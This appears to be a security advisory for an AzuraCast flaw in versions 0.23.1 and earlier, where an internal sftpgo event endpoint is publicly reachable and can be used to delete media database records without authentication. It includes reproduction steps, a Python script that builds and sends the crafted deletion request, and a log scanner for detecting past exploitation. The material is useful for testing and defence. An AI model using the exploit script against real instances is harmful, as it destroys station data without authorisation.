AzuraCast
cpe:2.3:a:azuracast:azuracast:*:*:*:*:*:*:*
- <= 0.23.1
A vulnerability in AzuraCast versions 0.23.1 and prior allows unauthorized database modifications through a publicly exposed API endpoint intended for internal SFTP operations. The endpoint exists so that the bundled SFTP server 'sftpgo' can notify AzuraCast of file events, but it was incorrectly exposed on AzuraCast's public HTTP API. A user who knows a station's SFTP username and the layout of its internal filesystem can send a crafted HTTP request that alters the station's database without revealing any internal details. The vulnerability is fixed in AzuraCast version 0.23.2, which restricts the internal API endpoint to localhost.
Exploitation allows unauthorized deletion of media-related database records for a targeted station, disrupting playlist associations and custom metadata even though the media records themselves are eventually recreated.
To reproduce this vulnerability, send a POST request to the '/api/internal/sftp-event' endpoint with the 'Content-Type' header set to 'application/json' and a JSON body describing a pre-delete action for a file on the station's internal filesystem. AzuraCast treats the request as a file-deletion notification from 'sftpgo' and deletes the database record for the specified file.
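The request described above, as an added example in Python (not code from the advisory or from the AzuraCast or sftpgo projects). The body field names `action`, `username` and `path` are assumed from sftpgo's action-hook JSON format, and the host, SFTP username and media path are placeholders to replace with values for an instance you are authorised to test. Sending the request to an unpatched instance deletes the database record for the named file, so `send_event()` is defined but never called in the block.

```python
"""Reproduction helper for the AzuraCast <= 0.23.1 exposed sftpgo event hook.

Added example, not AzuraCast's or sftpgo's own code. Field names
(action, username, path) are assumed from sftpgo's action-hook format;
host, username and path values are placeholders.
"""
import json
import urllib.error
import urllib.request

ENDPOINT_PATH = "/api/internal/sftp-event"


def build_event(username: str, path: str, action: str = "pre-delete") -> dict:
    """Build the hook body sftpgo would send AzuraCast before deleting a file.

    'path' is the file's location on the station's internal filesystem, which
    is why the attacker needs to know the filesystem layout.
    """
    return {"action": action, "username": username, "path": path}


def build_request(base_url: str, username: str, path: str) -> urllib.request.Request:
    """Assemble the crafted POST as the reproduction steps describe:
    JSON body, Content-Type: application/json, and no session or API key."""
    body = json.dumps(build_event(username, path)).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT_PATH,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def send_event(base_url: str, username: str, path: str, timeout: float = 10.0) -> int:
    """Send the request and return the HTTP status code.

    Only run this against an instance you are authorised to test: on an
    unpatched instance it deletes the media record for the named file.
    """
    req = build_request(base_url, username, path)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def is_likely_exposed(status: int) -> bool:
    """Interpret the status of a request sent from outside the host.

    A 2xx means the internal endpoint accepted a request from a non-loopback
    client, i.e. the instance is almost certainly still on <= 0.23.1. A patched
    instance restricts the endpoint to localhost and is expected to reject it.
    """
    return 200 <= status < 300
```

A patched instance should refuse the request from any client other than localhost; a 2xx answer from outside the host means the endpoint is still exposed.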
Update to AzuraCast version 0.23.2, which fixes this vulnerability by making the internal API endpoint reachable only from localhost.
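To check whether an instance was hit before it was upgraded, the following added example (not part of the advisory or of AzuraCast) scans web-server access logs for requests to the internal endpoint from anything other than loopback. Since the only legitimate caller is sftpgo on the same host, any other source is suspicious. It assumes nginx's default combined log format, as in the constructed sample lines below, and that the logged client address is the real source rather than a reverse proxy.

```python
"""Retroactive check for external hits on the exposed sftpgo hook.

Added example, not part of the advisory or of AzuraCast. Assumes nginx's
"combined" access-log format and that $remote_addr is the real client.
The sample log lines are constructed for this example.
"""
import ipaddress
import re
from dataclasses import dataclass

HOOK_PATH = "/api/internal/sftp-event"

# nginx "combined" format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)


@dataclass
class Hit:
    time: str
    ip: str
    method: str
    status: int
    user_agent: str


def _is_loopback(ip: str) -> bool:
    """True for 127.0.0.0/8 and ::1; unparsable addresses are treated as external."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def find_external_hook_hits(lines):
    """Return every request to the hook path that did not come from loopback.

    Malformed lines are skipped rather than aborting the scan, and a query
    string on the path is ignored so '/api/internal/sftp-event?x=1' still matches.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if path != HOOK_PATH or _is_loopback(m.group("ip")):
            continue
        hits.append(Hit(m.group("time"), m.group("ip"), m.group("method"),
                        int(m.group("status")), m.group("ua")))
    return hits


def successful_hits(hits):
    """Keep only requests the server accepted; those are the ones the application processed."""
    return [h for h in hits if 200 <= h.status < 300]


# Constructed sample: one legitimate local call, one IPv6 loopback call,
# two external attempts (one accepted, one rejected), an unrelated request
# and a malformed line.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Jan/2024:12:00:01 +0000] "POST /api/internal/sftp-event HTTP/1.1" 200 2 "-" "Go-http-client/1.1"',
    '::1 - - [10/Jan/2024:12:00:02 +0000] "POST /api/internal/sftp-event HTTP/1.1" 200 2 "-" "Go-http-client/1.1"',
    '203.0.113.7 - - [10/Jan/2024:12:05:42 +0000] "POST /api/internal/sftp-event HTTP/1.1" 200 2 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Jan/2024:12:06:10 +0000] "GET / HTTP/1.1" 200 1834 "-" "curl/8.4.0"',
    '198.51.100.9 - - [11/Jan/2024:03:14:00 +0000] "POST /api/internal/sftp-event?x=1 HTTP/1.1" 403 153 "-" "python-requests/2.31.0"',
    'not a log line',
]


if __name__ == "__main__":
    for h in find_external_hook_hits(SAMPLE_LOG):
        print(f"{h.time} {h.ip} {h.method} -> {h.status} ({h.user_agent})")
```

Run it over the real log with `find_external_hook_hits(open("/path/to/access.log"))`; a 2xx hit from outside the host on an instance that was on 0.23.1 or earlier means the station's media records should be checked for missing playlist associations and metadata.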